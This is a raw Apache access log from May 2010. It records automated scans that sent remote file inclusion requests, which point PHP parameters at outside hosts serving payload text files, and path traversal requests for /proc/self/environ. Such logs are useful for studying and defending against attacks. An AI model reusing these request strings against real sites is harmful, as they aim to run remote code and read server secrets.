81.92.204.67 - - [31/May/2010:01:58:14 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:58:14 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:01:58:26 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:01:58:26 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:01:58:36 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:01:58:37 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.100.228.237 - - [31/May/2010:01:59:00 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [31/May/2010:01:59:01 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [31/May/2010:01:59:23 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [31/May/2010:01:59:24 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.238.145.196 - - [31/May/2010:01:59:29 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:59:29 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:59:29 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:26 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:26 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:26 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:26 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:27 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:27 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:29 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:29 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:29 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:36 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:36 -0500] "GET /logs//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:00:37 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:01:44 -0500] "GET /logs/access_log.1270857600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:01:44 -0500] "GET //journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:01:44 -0500] "GET /logs//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:02:17 -0500] "GET /logs/access_log.1263081600//journal.php3//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_pat=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:02:07:59 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:02:07:59 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:02:07:59 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:02:08:01 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:02:08:15 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:02:08:16 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
122.112.32.51 - - [31/May/2010:02:09:09 -0500] "GET /logs/access_log.1272585600//genlib.php?cms[tngpath]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:02:09:09 -0500] "GET //genlib.php?cms[tngpath]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:02:09:09 -0500] "GET /logs/access_log.1271721600//genlib.php?cms[tngpath]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:02:09:09 -0500] "GET /logs//genlib.php?cms[tngpath]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.121.217.207 - - [31/May/2010:02:11:56 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.121.217.207 - - [31/May/2010:02:11:56 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.217.207 - - [31/May/2010:02:11:56 -0500] "GET /logs/access_log.1274572800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:02:15:27 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gbdata.co.uk/images/zd1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:02:15:41 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gbdata.co.uk/images/zd1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:02:15:41 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gbdata.co.uk/images/zd1.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:02:18:40 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:02:18:40 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:02:18:40 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:21:47 -0500] "GET /logs/access_log.1271894400//inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:21:47 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:21:47 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:21:53 -0500] "GET /logs/access_log.1271376000//inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:22:55 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:22:55 -0500] "GET /logs/access_log.1271376000//inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:22:55 -0500] "GET /logs/access_log.1271894400//inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:22:55 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.132.187.170 - - [31/May/2010:02:24:29 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.132.187.170 - - [31/May/2010:02:24:29 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.132.187.170 - - [31/May/2010:02:24:31 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.132.187.170 - - [31/May/2010:02:24:42 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.132.187.170 - - [31/May/2010:02:24:46 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.132.187.170 - - [31/May/2010:02:24:49 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
194.100.228.237 - - [31/May/2010:02:25:06 -0500] "GET /logs/index.php?option=com_rd_download&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [31/May/2010:02:25:06 -0500] "GET /index.php?option=com_rd_download&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
95.156.233.139 - - [31/May/2010:02:25:23 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:02:25:23 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:02:25:24 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.156.233.139 - - [31/May/2010:02:25:24 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
62.44.82.61 - - [31/May/2010:02:25:30 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:02:25:33 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:02:25:33 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:02:25:36 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:02:25:36 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:02:25:36 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
91.121.145.89 - - [31/May/2010:02:25:36 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [31/May/2010:02:25:36 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [31/May/2010:02:25:37 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [31/May/2010:02:25:37 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
77.221.130.25 - - [31/May/2010:02:25:37 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:02:25:37 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:02:25:37 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:26:01 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:26:01 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:26:01 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:26:11 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 359 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:26:11 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:26:11 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:26:42 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:26:42 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:26:42 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.223.118.6 - - [31/May/2010:02:27:05 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
83.223.118.6 - - [31/May/2010:02:27:05 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.128.84.14 - - [31/May/2010:02:27:29 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:27:29 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:27:29 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 359 "-""Mozilla/5.0"
174.121.115.191 - - [31/May/2010:02:27:51 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.115.191 - - [31/May/2010:02:27:51 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.128.84.14 - - [31/May/2010:02:28:13 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:28:13 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:02:28:13 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
91.121.145.89 - - [31/May/2010:02:30:11 -0500] "GET /logs//admin/auth.php?xcart_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.803"
91.121.145.89 - - [31/May/2010:02:30:11 -0500] "GET //admin/auth.php?xcart_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
174.121.217.207 - - [31/May/2010:02:31:52 -0500] "GET //Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.121.217.207 - - [31/May/2010:02:31:53 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
174.121.217.207 - - [31/May/2010:02:31:53 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
207.46.204.178 - - [31/May/2010:02:31:57 -0500] "GET /logs/access_log.1162339200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.107.213.98 - - [31/May/2010:02:32:21 -0500] "GET /?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.107.213.98 - - [31/May/2010:02:32:22 -0500] "GET /logs/?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 200 7670 "-""Mozilla/5.0"
89.107.213.98 - - [31/May/2010:02:32:22 -0500] "GET /logs/access_log.1271548800/?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.121.115.191 - - [31/May/2010:02:32:38 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.115.191 - - [31/May/2010:02:32:39 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.115.191 - - [31/May/2010:02:32:39 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
77.221.130.25 - - [31/May/2010:02:33:35 -0500] "GET /logs/access_log.1273363200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:02:34:45 -0500] "GET /logs/access_log.1273363200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:37:39 -0500] "GET /logs/access_log.1273363200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
193.126.206.28 - - [31/May/2010:02:37:41 -0500] "GET /logs/access_log.1273363200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
91.121.145.89 - - [31/May/2010:02:40:45 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
91.121.145.89 - - [31/May/2010:02:40:45 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
207.46.13.100 - - [31/May/2010:02:40:56 -0500] "GET /logs/access_log.1185408000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.243.57.219 - - [31/May/2010:02:41:33 -0500] "POST //xmlrpc/xmlrpc.php HTTP/1.1" 404 302 "-""Mozilla/5.0"
83.243.57.219 - - [31/May/2010:02:41:34 -0500] "POST /logs//xmlrpc/xmlrpc.php HTTP/1.1" 404 307 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:42:01 -0500] "GET /logs/access_log.1272153600/errors.php?error=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:42:01 -0500] "GET /errors.php?error=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:42:02 -0500] "GET /logs/errors.php?error=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:42:22 -0500] "GET /logs/errors.php?error=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:42:22 -0500] "GET /errors.php?error=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.109.108.186 - - [31/May/2010:02:42:22 -0500] "GET /logs/access_log.1272153600/errors.php?error=http://www.home.iltester.net/includes/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.170.107.145 - - [31/May/2010:02:46:32 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
83.170.107.145 - - [31/May/2010:02:46:33 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.14.231.236 - - [31/May/2010:02:47:07 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 287 "-""libwww-perl/5.805"
74.14.231.236 - - [31/May/2010:02:47:07 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 282 "-""libwww-perl/5.805"
81.92.204.67 - - [31/May/2010:02:47:20 -0500] "GET //journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:02:47:20 -0500] "GET /logs/access_log.1271548800//journal.php3//?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
